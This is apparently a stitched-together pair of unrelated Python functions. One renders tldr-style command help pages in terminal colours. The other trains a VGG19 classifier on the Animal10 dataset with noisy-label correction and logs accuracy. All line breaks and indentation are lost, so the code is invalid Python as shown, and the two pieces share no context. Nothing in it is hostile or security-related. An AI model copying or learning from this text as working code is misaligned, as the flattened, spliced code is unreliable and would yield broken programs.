def output(page): # Need a better fancy method? if page is not None: for line in page: line = line.rstrip().decode('utf-8') if len(line) < 1: cprint(line.ljust(columns), *colors_of('blank')) elif line[0] == '#': cprint(line.ljust(columns), *colors_of('name')) elif line[0] == '>': line = ' ' + line[1:] cprint(line.ljust(columns), *colors_of('description')) elif line[0] == '-': cprint(line.ljust(columns), *colors_of('example')) elif line[0] == '`': line = line[1:-1] # need to actually parse `` elements = [ colored(' ' * LEADING_SPACES_NUM, *colors_of('blank')), ] replaced_spaces = 0 for item in command_splitter.split(line): item, replaced = param_regex.subn( lambda x: colored( x.group('param'), *colors_of('parameter')), item) if not replaced: item = colored(item, *colors_of('command')) else: # In replacement of {{}} from template pattern replaced_spaces += 4 elements.append(item) # Manually adding painted in blank spaces elements.append(colored(' ' * (columns - len(line) - LEADING_SPACES_NUM + replaced_spaces), *colors_of('blank'))) print(''.join(elements)) else: cprint(line.ljust(columns), *colors_of('description')) # Need a cleaner way to pad three colored lines [cprint(''.ljust(columns), *colors_of('blank')) for i in range(3)]
def main(arg_seed, arg_timestamp): random_seed = arg_seed np.random.seed(random_seed) random.seed(random_seed) torch.manual_seed(random_seed) torch.cuda.manual_seed(random_seed) torch.cuda.manual_seed_all(random_seed) torch.backends.cudnn.deterministic = True # need to set to True as well print('Random Seed {}\n'.format(arg_seed)) # -- training parameters num_epoch = args.epoch milestone = [50, 75] batch_size = args.batch num_workers = 2 weight_decay = 1e-3 gamma = 0.2 current_delta = args.delta lr = args.lr start_epoch = 0 # -- specify dataset # data augmentation transform_train = transforms.Compose([ transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]), ]) transform_test = transforms.Compose([ transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]), ]) trainset = Animal10(split='train', transform=transform_train) trainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size, shuffle=True, num_workers=num_workers, worker_init_fn=_init_fn, drop_last=True) testset = Animal10(split='test', transform=transform_test) testloader = torch.utils.data.DataLoader(testset, batch_size=batch_size * 4, shuffle=False, num_workers=num_workers) num_class = 10 print('train data size:', len(trainset)) print('test data size:', len(testset)) # -- create log file if arg_timestamp: time_stamp = time.strftime("%Y%m%d-%H%M%S") file_name = 'Ours(' + time_stamp + ').txt' else: file_name = 'Ours.txt' log_dir = check_folder('logs') file_name = os.path.join(log_dir, file_name) saver = open(file_name, "w") saver.write(args.__repr__() + "\n\n") saver.flush() # -- set network, optimizer, scheduler, etc net = vgg19_bn(num_classes=num_class, pretrained=False) net = nn.DataParallel(net) optimizer = optim.SGD(net.parameters(), lr=lr, weight_decay=weight_decay) device = torch.device("cuda" if torch.cuda.is_available() else "cpu") net = net.to(device) exp_lr_scheduler = lr_scheduler.MultiStepLR(optimizer, milestones=milestone, gamma=gamma) criterion = torch.nn.CrossEntropyLoss() # -- misc iterations = 0 f_record = torch.zeros([args.rollWindow, len(trainset), num_class]) for epoch in range(start_epoch, num_epoch): train_correct = 0 train_loss = 0 train_total = 0 net.train() for i, (images, labels, indices) in enumerate(trainloader): if images.size(0) == 1: # when batch size equals 1, skip, due to batch normalization continue images, labels = images.to(device), labels.to(device) outputs = net(images) loss = criterion(outputs, labels) optimizer.zero_grad() loss.backward() optimizer.step() train_loss += loss.item() train_total += images.size(0) _, predicted = outputs.max(1) train_correct += predicted.eq(labels).sum().item() f_record[epoch % args.rollWindow, indices] = F.softmax(outputs.detach().cpu(), dim=1) iterations += 1 if iterations % 100 == 0: cur_train_acc = train_correct / train_total * 100. cur_train_loss = train_loss / train_total cprint('epoch: {}\titerations: {}\tcurrent train accuracy: {:.4f}\ttrain loss:{:.4f}'.format( epoch, iterations, cur_train_acc, cur_train_loss), 'yellow') if iterations % 5000 == 0: saver.write('epoch: {}\titerations: {}\ttrain accuracy: {}\ttrain loss: {}\n'.format( epoch, iterations, cur_train_acc, cur_train_loss)) saver.flush() train_acc = train_correct / train_total * 100. cprint('epoch: {}'.format(epoch), 'yellow') cprint('train accuracy: {:.4f}\ntrain loss: {:.4f}'.format(train_acc, train_loss), 'yellow') saver.write('epoch: {}\ntrain accuracy: {}\ntrain loss: {}\n'.format(epoch, train_acc, train_loss)) saver.flush() exp_lr_scheduler.step() if epoch >= args.warm_up: f_x = f_record.mean(0) y_tilde = trainset.targets y_corrected, current_delta = lrt_correction(y_tilde, f_x, current_delta=current_delta, delta_increment=0.1) logging.info('Current delta:\t{}\n'.format(current_delta)) trainset.update_corrupted_label(y_corrected) # testing net.eval() test_total = 0 test_correct = 0 with torch.no_grad(): for i, (images, labels, _) in enumerate(testloader): images, labels = images.to(device), labels.to(device) outputs = net(images) test_total += images.size(0) _, predicted = outputs.max(1) test_correct += predicted.eq(labels).sum().item() test_acc = test_correct / test_total * 100. cprint('>> current test accuracy: {:.4f}'.format(test_acc), 'cyan') saver.write('>> current test accuracy: {}\n'.format(test_acc)) saver.flush() saver.close()